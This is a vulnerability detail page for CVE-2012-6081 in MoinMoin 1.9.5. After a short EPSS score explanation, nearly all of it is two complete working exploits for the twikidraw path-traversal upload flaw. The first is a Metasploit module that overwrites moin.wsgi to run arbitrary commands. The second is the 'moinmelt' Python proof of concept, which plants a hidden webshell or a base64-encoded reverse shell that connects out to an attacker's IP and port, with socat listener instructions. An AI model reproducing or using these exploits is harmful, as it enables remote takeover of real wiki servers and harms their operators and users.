CVE-2012-6081 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MoinMoin twikidraw Action Traversal File Upload', 'Description' => %q{ This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability exists on the manage of the twikidraw actions, where a traversal path can be used in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi configurations by overwriting moin.wsgi, which allows to execute arbitrary python code, as exploited in the wild on July, 2012. The user is warned to use this module at his own risk since it's going to overwrite the moin.wsgi file, required for the correct working of the MoinMoin wiki. While the exploit will try to restore the attacked application at post exploitation, correct working after all isn't granted. }, 'Author' => [ 'Unknown', # Vulnerability discovery 'HTP', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-6081' ], [ 'OSVDB', '88825' ], [ 'BID', '57082' ], [ 'EDB', '25304' ], [ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ], [ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ] ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'Space' => 16384, # Enough one to fit any payload 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet netcat perl' } }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'MoinMoin 1.9.5', { }]], 'DisclosureDate' => 'Dec 30 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "MoinMoin base path", "/" ]), OptString.new('WritablePage', [ true, "MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)", "/WikiSandBox" ]), OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) ], self.class) end def moinmoin_template(path) template =[] template << "# -*- coding: iso-8859-1 -*-" template << "import sys, os" template << "sys.path.insert(0, 'PATH')".gsub(/PATH/, File.dirname(path)) template << "from MoinMoin.web.serving import make_application" template << "application = make_application(shared=True)" return template end def restore_file(session, file, contents) first = true contents.each {|line| if first session.shell_command_token("echo \"#{line}\" > #{file}") first = false else session.shell_command_token("echo \"#{line}\" >> #{file}") end } end # Try to restore a basic moin.wsgi file with the hope of making the # application usable again. # Try to search on /usr/local/share/moin (default search path) and the # current path (apache user home). Avoiding to search on "/" because it # could took long time to finish. def on_new_session(session) print_status("Trying to restore moin.wsgi...") begin files = session.shell_command_token("find `pwd` -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } files = session.shell_command_token("find /usr/local/share/moin -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } print_warning("Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.") rescue print_warning("Error while restring moin.wsgi, manual restoring would be required.") end end def do_login(username, password) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'vars_post' => { 'action' => 'login', 'name' => username, 'password' => password, 'login' => 'Login' } }) if not res or res.code != 200 or not res.headers.include?('Set-Cookie') return nil end return res.get_cookies end def upload_code(session, code) vprint_status("Retrieving the ticket...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'modify', 'target' => '../../../../moin.wsgi' } }) if not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/ vprint_error("Error retrieving the ticket") return nil end ticket = $1 vprint_good("Ticket found: #{ticket}") my_payload = "[MARK]#{code}[MARK]" post_data = Rex::MIME::Message.new post_data.add_part("drawing.r if()else[]\nexec eval(\"open(__file__)\\56read()\\56split('[MARK]')[-2]\\56strip('\\\\0')\")", nil, nil, "form-data; name=\"filename\"") post_data.add_part(my_payload, "image/png", nil, "form-data; name=\"filepath\"; filename=\"drawing.png\"") my_data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'save', 'ticket' => ticket, 'target' => '../../../../moin.wsgi' }, 'data' => my_data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if not res or res.code != 200 or not res.body.empty? vprint_error("Error uploading the payload") return nil end return true end def check @base = target_uri.path @base << '/' if @base[-1, 1] != '/' res = send_request_cgi({ 'uri' => normalize_uri(@base) }) if res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/ return Exploit::CheckCode::Detected elsif res return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def writable_page?(session) res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, }) if not res or res.code != 200 or res.body !~ /Edit \(Text\)/ return false end return true end def exploit # Init variables @page = datastore['WritablePage'] @base = target_uri.path @base << '/' if @base[-1, 1] != '/' # Login if needed if (datastore['USERNAME'] and not datastore['USERNAME'].empty? and datastore['PASSWORD'] and not datastore['PASSWORD'].empty?) print_status("Trying login to get session ID...") session = do_login(datastore['USERNAME'], datastore['PASSWORD']) else print_status("Using anonymous access...") session = "" end # Check authentication if not session fail_with(Exploit::Failure::NoAccess, "Error getting a session ID, check credentials or WritablePage option") end # Check writable permissions if not writable_page?(session) fail_with(Exploit::Failure::NoAccess, "There are no write permissions on #{@page}") end # Upload payload print_status("Trying to upload payload...") python_cmd = "import os\nos.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))" res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))") if not res fail_with(Exploit::Failure::Unknown, "Error uploading the payload") end # Execute payload print_status("Executing the payload...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'AttachFile' } }, 5) end end

#!/usr/bin/env python # -*- coding: utf-8 -*- ascii = '\x1b[1;31m'########################################################################### ascii +=' \r\n'# ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n'# ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n'# ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒ ██▒ ██▒ \r\n'# ascii +=' ▒█▒ ▒█▒ ▒█▒ ▒█▒ █▒█ ▒█▒ ▒█▒▒█▒█▒ ▒█▒ ▒█▒ ▒█▒ ▒█▒ ▒█▒ ▒█▒ \r\n'# ascii +=' █▒▒ ▒▒█ █▒█ █▒█ ▒█▒ ▒▒█ █▒█ ▒▒█▒ █▒▒ ▒▒█ █▒█ █▒▒▒░▒ █▒▒ █▒▒ \r\n'# ascii +=' ▒█▒ ▒ ▒█▒ ▒█▒ ▒▒▒ ▒▒▒ ▒█▒ ▒▒▒ ▒█▒ ▒ ▒█▒ ▒▒▒▒▒░ ▒▒▒ ▒▒▒ \r\n'# ascii +=' ▒▒░ ▒▒░ ▒▒░ ▒▒▒ ▒▒░ ▒▒░ ▒▒▒ ▒▒░ ▒▒░ ▒▒░ ▒▒░ ▒▒░ \r\n'# ascii +=' ░▒░ ░▒░ ░▒░ ▒░▒ ░▒░ ░▒░ ▒░▒ ░▒░ ░▒░ ░▒░ ░▒░ ░▒░ \r\n'# ascii +=' ░░░ ░░ ░░░░░ ░░ ░░ ░░ ░░ ░░░ ░░ ░░ ░░░░ ░░ ░░░░ ░░ \r\n'# ascii +=' ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░░ ░░ ░ ░░ ░ ░ ░ \r\n'# ascii +=' \r\n'# ascii +=' ~[ PoC v2 : Remote arbitrary command execution for MoinMoin ]~ \r\n'# ascii +='\x1b[0m'############################################################################## # V1: Stealth webshell, available upon Apache restart (24H) # V2: Update stealth webshell, backconnect shell, available immediately (RISKY); Login functionality # ToDo: Handle TextCha's, spoof UA # # Usage: python moinmelt.py # Requires: `requests` module, socat # # cr3dz: [HTP], Unnamed import requests, re, getpass, random print ascii print "[*] Now with", random.choice(["hookers", "SYN floods", "integrated LOIC", "a bullshit Reason Generator", "UDP floods", "an admin informer", "a backdoor", "automatic defacing", "Full Disclosure letters", "advertisements", "an End-User License Agreement", "a 30-day Trial", "a free AOL subscription", "more educational value", "famewhoring", "Havij support", "advice from Sabu", "incomprehensible commentary", "hacker apparel", "advice from Kevin Mitnick", "a Unity applet", "JUSTICE", "FreeNode support", "advice from Chippy1337"]) + "!" target = raw_input("[*] Target site? ").replace("http://","").replace("FrontPage","").replace("WikiSandBox","") print "[*] Method of execution:" print "[1] Stealth webshell, available upon Apache restart (24H)" print "[2] Backconnect shell, available immediately (RISKY)" print "[3] Exit" method = raw_input("> ") if method=='3': exit() elif method=='2': print "[*] Preparing exploit.." filename = 'drawing.r if()else[]\nexec eval("open(__file__)\\56read()\\56split(\'[MARK]\')[-2]\\56strip(\'\\\\0\')")' data = """IyAtKi0gY29kaW5nOiBpc28tODg1OS0xIC0qLQoKaW1wb3J0IHN5cywgb3MsIHNvY2tldCwgcHR5 LCBzZWxlY3QKcHdkID0gb3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKQpzeXMucGF0aC5pbnNlcnQo MCwgcHdkKQoKZGVmIG1vaW5tZWx0c2hlbGwoaG9zdCxwb3J0KToKICAgIHNvY2sgPSBzb2NrZXQu c29ja2V0KCkKICAgIHRyeToKICAgICAgICBzb2NrLmNvbm5lY3QoKGhvc3QsIGludChwb3J0KSkp CiAgICBleGNlcHQ6CiAgICAgICAgcmV0dXJuCiAgICBwaWQsIGNoaWxkUHJvY2VzcyA9IHB0eS5m b3JrKCkKICAgIGlmIHBpZCA9PSAwOgogICAgICAgIHNvY2suc2VuZCgiW35dIFx4MWJbMTszMW1N b2luTWVsdCBSZXZlcnNlIFNoZWxsXHgxYlswbVxyXG4iKQogICAgICAgIG9zLnB1dGVudigiSElT VEZJTEUiLCIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUFdEIiwgcHdkKQogICAgICAg IG9zLnB1dGVudigiSE9NRSIsIG9zLmdldGN3ZCgpKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIs Jy91c3IvbG9jYWwvc2JpbjovdXNyL3NiaW46L3NiaW46Jytvcy5nZXRlbnYoJ1BBVEgnKSkKICAg ICAgICBvcy5wdXRlbnYoIlRFUk0iLCdsaW51eCcpCiAgICAgICAgb3MucHV0ZW52KCJQUzEiLCdc eDFiWzE7MzFtXFx1QFxcaDpcXHdcXCQgXHgxYlswbScpCiAgICAgICAgcHR5LnNwYXduKCIvYmlu L2Jhc2giKQogICAgICAgIHNvY2suc2VuZCgiXHJcbiIpCiAgICAgICAgc29jay5zaHV0ZG93bigx KQogICAgZWxzZToKICAgICAgICBiID0gc29jay5tYWtlZmlsZShvcy5PX1JET05MWXxvcy5PX05P TkJMT0NLKQogICAgICAgIGMgPSBvcy5mZG9wZW4oY2hpbGRQcm9jZXNzLCdyKycpCiAgICAgICAg eSA9IHtiOmMsYzpifQogICAgICAgIHRyeToKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAg ICAgICAgICAgIGZvciBuIGluIHNlbGVjdC5zZWxlY3QoW2IsY10sW10sW10pWzBdOgogICAgICAg ICAgICAgICAgICAgIHogPSBvcy5yZWFkKG4uZmlsZW5vKCksNDA5NikKICAgICAgICAgICAgICAg ICAgICB5W25dLndyaXRlKHopCiAgICAgICAgICAgICAgICAgICAgeVtuXS5mbHVzaCgpCiAgICAg ICAgZXhjZXB0OgogICAgICAgICAgICBwYXNzCgp0cnk6CiAgICBwaWQgPSBvcy5mb3JrKCkKICAg IGlmIG5vdCBwaWQ6IG1vaW5tZWx0c2hlbGwoJ1tJUF0nLCAnW1BPUlRdJykKZXhjZXB0OgogICAg cGFzcyAjIEF2b2lkIGludGVybmFsIHNlcnZlciBlcnJvcnMKCmZyb20gTW9pbk1vaW4ud2ViLnNl cnZpbmcgaW1wb3J0IG1ha2VfYXBwbGljYXRpb24KYXBwbGljYXRpb24gPSBtYWtlX2FwcGxpY2F0 aW9uKHNoYXJlZD1UcnVlKQ==""".strip().decode("base64") elif method=='1': print "[*] Preparing exploit.." filename = "drawing.r if()else[]\nimport os\ndef execute(p,r):exec\"print>>r,os\\56popen(r\\56values['c'])\\56read()\"" data = "MoinMoin error\n" else: print "[-] \x1b[0;31mInvalid method\x1b[0m" exit() print "[*] Checking permissions on WikiSandBox page.." username=None password=None authorizationcookie=None jar=None permission_check = requests.get("http://%s/WikiSandBox" % target).text if "Edit (Text)" in permission_check: print "[+] No security" check = True elif "Immutable Page" in permission_check: print "[-] Authorization required" check = False else: print "[-] \x1b[0;31mCould not identify editable page!\x1b[0m" print "[-] Authorization required" check = False if not check: have_acc = raw_input("[*] Do you have an account? [Y/N] ").lower() if have_acc.startswith("y"): username = raw_input("[*] Username: ") password = getpass.getpass("[*] Password: ") else: print "[-] \x1b[0;31mCreate an account and restart the exploitation process\x1b[0m" print "[-] http://%s/?action=newaccount" % target url = "http://%s/" % target print "[*] Logging in" signon = {'action':'login','name':username,'password':password,'login':'Login'} jar = requests.post(url, data=signon).cookies for cookie in jar.values(): if len(cookie)==40: authorizationcookie=cookie if not authorizationcookie: print "[-] \x1b[0;31mLogin failed\x1b[0m" exit() else: print "[+] Login succeeded" permission_check2 = requests.get("http://%s/WikiSandBox" % target).text """ if "Edit (Text)" in permission_check2: print "[+] Successfully authorized to edit pages" elif "Immutable Page" in permission_check: print "[-] \x1b[0;31mFailed authorization check\x1b[0m" exit() else: print "[?] \x1b[0;33mLost track of environment.. continuing anyway\x1b[0m" exit() """ print "[*] Obtaining ticket credentials to write backdoor.." if method == '1': ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../plugin/action/moinexec.py" % target, cookies=jar) elif method == '2': ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../../moin.wsgi" % target, cookies=jar) m = re.search('ticket=(.*?)&target', ticket.text) try: ticket_hash = m.group(1) print "[+] Extracted ticket hash from MoinMoin: %s" % (ticket_hash) except: print "[-] \x1b[0;31mFailed to extract ticket hash from MoinMoin!\x1b[0m" exit() print "[*] Sending payload.." if method == '1': url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../plugin/action/moinexec.py" % (target, ticket_hash) b = [] b.append("\r\n--89692781418184") b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename)) b.append("--89692781418184") b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"") b.append("Content-Type: image/png\r\n") b.append(data) b.append("--89692781418184--") body = "\r\n".join(b) headers = {} headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184' r = requests.post(url, cookies=jar, data=body, headers=headers) if(r.text == ""): print "[+] Exploit completed" print "[*] Upon Apache restart, your shell will be available at:" print "http://%s/WikiSandBox?action=moinexec&c=[command]" % target else: print "[-] \x1b[0;31mExploit failed\x1b[0m" elif method == '2': print "[*] Backconnect options:" ip = raw_input("[*] IP? ") port = raw_input("[*] Port? ") print "[*] To recieve your shell, login to %s and run: socat file:`tty`,raw,echo=0 tcp4-listen:%s" % (ip,port) raw_input("[*] Press enter to continue ") payload = "[MARK]exec \"%s\".decode(\"base64\")[MARK]\n" % data.replace("[IP]",ip).replace("[PORT]",port).encode("base64").replace("\n","") url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../../moin.wsgi" % (target, ticket_hash) b = [] b.append("\r\n--89692781418184") b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename)) b.append("--89692781418184") b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"") b.append("Content-Type: image/png\r\n") b.append(payload) b.append("--89692781418184--") body = "\r\n".join(b) headers = {} headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184' r = requests.post(url, cookies=jar, data=body, headers=headers) if(r.text == ""): print "[+] Payload file written" else: print "[-] \x1b[0;31mExploit failed\x1b[0m" exit() print "[*] Sending reverse shell" result = requests.get("http://%s/WikiSandBox?action=AttachFile" % target, cookies=jar).text if "Internal Server Error" in result or "Traceback" in result: print "[-] \x1b[0;31mSHIT\x1b[0m" else: print "[+] Shell sent successfully" # American: How the fuck did you get in here? # Lone Man: I used my imagination.